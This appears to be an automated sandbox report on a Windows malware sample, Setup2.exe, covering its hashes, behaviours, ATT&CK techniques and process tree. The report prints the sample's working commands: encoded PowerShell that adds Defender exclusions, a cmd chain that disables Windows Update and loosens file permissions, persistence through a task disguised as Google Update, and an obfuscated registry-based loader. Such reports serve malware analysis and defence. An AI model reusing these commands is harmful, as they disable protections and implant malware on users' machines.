Analysis

  • max time kernel
    10s
  • max time network
    76s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-08-2022 13:40

General

  • Target

    Setup2.exe

  • Size

    4.5MB

  • MD5

    7ede5e1864c423c59a1cb3bdcd7cc939

  • SHA1

    f34f722ed04615441656ccef087e7b982ae09af9

  • SHA256

    4754c64162263a12327a42ebcd023e7d0aaae400d02915c1c0ea972ce994842d

  • SHA512

    47350800da01d48c6c5ae1a7132bb3f9ed1a247fefbd153b4ec890fd1946a5812ae901f18b775dcc30deeb61e712f42436fcee1ba642ed1b8086517b81c9c95b

  • SSDEEP

    98304:dN1vJXa7MqmTWoYNag+r2UFKl2PjXvp0rcqh2MqnPs17EwoIsuimtRc:dLJXa7WTZrjPjxCh8M7VoJuicRc

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry key 1 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup2.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup2.exe"
    1⤵
    • Drops file in Drivers directory
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZAB2AHAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdAB5AGsAIwA+AA=="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5080
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1432
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:1316
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:4632
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:1452
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:1780
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:4240
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        3⤵
        • Modifies registry key
        PID:4660
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        3⤵
        • Modifies registry key
        PID:2236
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        3⤵
        • Modifies security service
        • Modifies registry key
        PID:3968
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        3⤵
        • Modifies registry key
        PID:4024
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        3⤵
        • Modifies registry key
        PID:316
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:388
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4756
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1536
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:704
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:4000
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:3516
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        3⤵
          PID:2832
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          3⤵
            PID:3180
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            3⤵
              PID:2212
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
              3⤵
                PID:4212
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                3⤵
                  PID:1592
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                  3⤵
                    PID:992
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                    3⤵
                      PID:3116
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4204
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -hibernate-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1540
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -hibernate-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4876
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -standby-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:516
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -standby-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2232
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgByACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAdABlAG0AcAAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHQAZQBtAHAALgBlAHgAZQAnACkAIAA8ACMAcQB3AHUAIwA+AA=="
                    2⤵
                      PID:4284
                      • C:\Users\Admin\AppData\Local\Temp\temp.exe
                        "C:\Users\Admin\AppData\Local\Temp\temp.exe"
                        3⤵
                          PID:964
                      • C:\Windows\System32\conhost.exe
                        C:\Windows\System32\conhost.exe
                        2⤵
                        • Drops file in Windows directory
                        PID:3904
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAbgBuAGIAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABJAEEAYwB3AEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBaAFEAQgByAEEARwBFAEEASQB3AEEAKwBBAEEAPQA9ACIAJwApACAAPAAjAGoAbABvAGMAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBmAHgAeQB4ACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAdwBpAHcAaQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAHYAaAAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAFMAZQB0AHUAcAAyAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAYQBlAGIAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAaABnAGkAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
                        2⤵
                          PID:1352
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                        1⤵
                          PID:3764
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                          1⤵
                            PID:1076
                          • C:\Windows\System32\dllhost.exe
                            C:\Windows\System32\dllhost.exe /Processid:{f33c2227-1b30-4dd7-8188-08ff070efb37}
                            1⤵
                              PID:3752
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHIAcwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAZQBrAGEAIwA+AA=="
                              1⤵
                                PID:4968

                              Network

                              MITRE ATT&CK Matrix ATT&CK v6

                              Persistence

                              Modify Existing Service

                              2
                              T1031

                              Defense Evasion

                              Modify Registry

                              2
                              T1112

                              Impair Defenses

                              1
                              T1562

                              File Permissions Modification

                              1
                              T1222

                              Discovery

                              Query Registry

                              1
                              T1012

                              System Information Discovery

                              2
                              T1082

                              Command and Control

                              Web Service

                              1
                              T1102

                              Impact

                              Service Stop

                              1
                              T1489

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                Filesize

                                2KB

                                MD5

                                d85ba6ff808d9e5444a4b369f5bc2730

                                SHA1

                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                SHA256

                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                SHA512

                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize

                                944B

                                MD5

                                59d97011e091004eaffb9816aa0b9abd

                                SHA1

                                1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

                                SHA256

                                18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

                                SHA512

                                d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize

                                64B

                                MD5

                                e77c06f62259f84b49e5e53588234472

                                SHA1

                                0ecc1af18ea48b0b19f4d3e8a43d70544f5e3179

                                SHA256

                                0444ffa5552bc655e5764456ad319a5b1da990eba166f50151fbfab6bc847935

                                SHA512

                                0d612004d2e150f7db17cea5039df88dde4e7a2413417f2eb709cfd6ce57202721d16582834cf648a934eb244d871e3a7f86f14fb275a2a4cbd61abd5c990c74

                              • C:\Users\Admin\AppData\Local\Temp\temp.exe
                                Filesize

                                7KB

                                MD5

                                f321da5881a6aaeb53da13d5c075406b

                                SHA1

                                979ed66205d2bad63fc016dc8c32cff6a2b6fc05

                                SHA256

                                a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c

                                SHA512

                                c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b

                              • C:\Users\Admin\AppData\Local\Temp\temp.exe
                                Filesize

                                7KB

                                MD5

                                f321da5881a6aaeb53da13d5c075406b

                                SHA1

                                979ed66205d2bad63fc016dc8c32cff6a2b6fc05

                                SHA256

                                a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c

                                SHA512

                                c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b

                              • memory/316-153-0x0000000000000000-mapping.dmp
                              • memory/388-154-0x0000000000000000-mapping.dmp
                              • memory/516-146-0x0000000000000000-mapping.dmp
                              • memory/592-201-0x00007FF862050000-0x00007FF862060000-memory.dmp
                                Filesize

                                64KB

                              • memory/704-174-0x0000000000000000-mapping.dmp
                              • memory/964-175-0x00007FF883C40000-0x00007FF884701000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/964-169-0x0000000000B30000-0x0000000000B38000-memory.dmp
                                Filesize

                                32KB

                              • memory/964-167-0x0000000000000000-mapping.dmp
                              • memory/992-187-0x0000000000000000-mapping.dmp
                              • memory/1076-186-0x0000000001710000-0x0000000001746000-memory.dmp
                                Filesize

                                216KB

                              • memory/1076-191-0x0000000004200000-0x0000000004828000-memory.dmp
                                Filesize

                                6.2MB

                              • memory/1316-140-0x0000000000000000-mapping.dmp
                              • memory/1352-176-0x00007FF883C40000-0x00007FF884701000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/1352-170-0x0000000000000000-mapping.dmp
                              • memory/1432-137-0x0000000000000000-mapping.dmp
                              • memory/1452-143-0x0000000000000000-mapping.dmp
                              • memory/1536-172-0x0000000000000000-mapping.dmp
                              • memory/1540-142-0x0000000000000000-mapping.dmp
                              • memory/1592-185-0x0000000000000000-mapping.dmp
                              • memory/1780-145-0x0000000000000000-mapping.dmp
                              • memory/2212-182-0x0000000000000000-mapping.dmp
                              • memory/2232-149-0x0000000000000000-mapping.dmp
                              • memory/2236-150-0x0000000000000000-mapping.dmp
                              • memory/2328-133-0x00007FF883C40000-0x00007FF884701000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/2328-173-0x00007FF883C40000-0x00007FF884701000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/2328-132-0x00000000008F0000-0x0000000000D76000-memory.dmp
                                Filesize

                                4.5MB

                              • memory/2328-139-0x000000001C760000-0x000000001C772000-memory.dmp
                                Filesize

                                72KB

                              • memory/2832-180-0x0000000000000000-mapping.dmp
                              • memory/3116-189-0x0000000000000000-mapping.dmp
                              • memory/3180-181-0x0000000000000000-mapping.dmp
                              • memory/3516-179-0x0000000000000000-mapping.dmp
                              • memory/3752-196-0x00007FF8A1FD0000-0x00007FF8A21C5000-memory.dmp
                                Filesize

                                2.0MB

                              • memory/3752-192-0x0000000140000000-0x0000000140042000-memory.dmp
                                Filesize

                                264KB

                              • memory/3752-193-0x00000001400033F4-mapping.dmp
                              • memory/3752-194-0x0000000140000000-0x0000000140042000-memory.dmp
                                Filesize

                                264KB

                              • memory/3752-195-0x0000000140000000-0x0000000140042000-memory.dmp
                                Filesize

                                264KB

                              • memory/3752-197-0x00007FF8A07D0000-0x00007FF8A088E000-memory.dmp
                                Filesize

                                760KB

                              • memory/3764-190-0x00007FF8A07D0000-0x00007FF8A088E000-memory.dmp
                                Filesize

                                760KB

                              • memory/3764-188-0x00007FF8A1FD0000-0x00007FF8A21C5000-memory.dmp
                                Filesize

                                2.0MB

                              • memory/3764-199-0x00007FF8A1FD0000-0x00007FF8A21C5000-memory.dmp
                                Filesize

                                2.0MB

                              • memory/3764-200-0x00007FF8A07D0000-0x00007FF8A088E000-memory.dmp
                                Filesize

                                760KB

                              • memory/3764-198-0x00007FF883C40000-0x00007FF884701000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/3764-184-0x00007FF883C40000-0x00007FF884701000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/3904-160-0x0000000140000000-0x0000000140056000-memory.dmp
                                Filesize

                                344KB

                              • memory/3904-162-0x0000000140000000-0x0000000140056000-memory.dmp
                                Filesize

                                344KB

                              • memory/3904-158-0x0000000140001844-mapping.dmp
                              • memory/3904-165-0x0000000140000000-0x0000000140056000-memory.dmp
                                Filesize

                                344KB

                              • memory/3904-157-0x0000000140000000-0x0000000140056000-memory.dmp
                                Filesize

                                344KB

                              • memory/3904-159-0x0000000140000000-0x0000000140056000-memory.dmp
                                Filesize

                                344KB

                              • memory/3968-151-0x0000000000000000-mapping.dmp
                              • memory/4000-178-0x0000000000000000-mapping.dmp
                              • memory/4024-152-0x0000000000000000-mapping.dmp
                              • memory/4204-138-0x0000000000000000-mapping.dmp
                              • memory/4212-183-0x0000000000000000-mapping.dmp
                              • memory/4240-147-0x0000000000000000-mapping.dmp
                              • memory/4284-156-0x0000000000000000-mapping.dmp
                              • memory/4284-163-0x00007FF883C40000-0x00007FF884701000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/4284-171-0x00007FF883C40000-0x00007FF884701000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/4632-141-0x0000000000000000-mapping.dmp
                              • memory/4660-148-0x0000000000000000-mapping.dmp
                              • memory/4756-155-0x0000000000000000-mapping.dmp
                              • memory/4876-144-0x0000000000000000-mapping.dmp
                              • memory/5080-134-0x0000000000000000-mapping.dmp
                              • memory/5080-135-0x00000298449F0000-0x0000029844A12000-memory.dmp
                                Filesize

                                136KB

                              • memory/5080-136-0x00007FF883C40000-0x00007FF884701000-memory.dmp
                                Filesize

                                10.8MB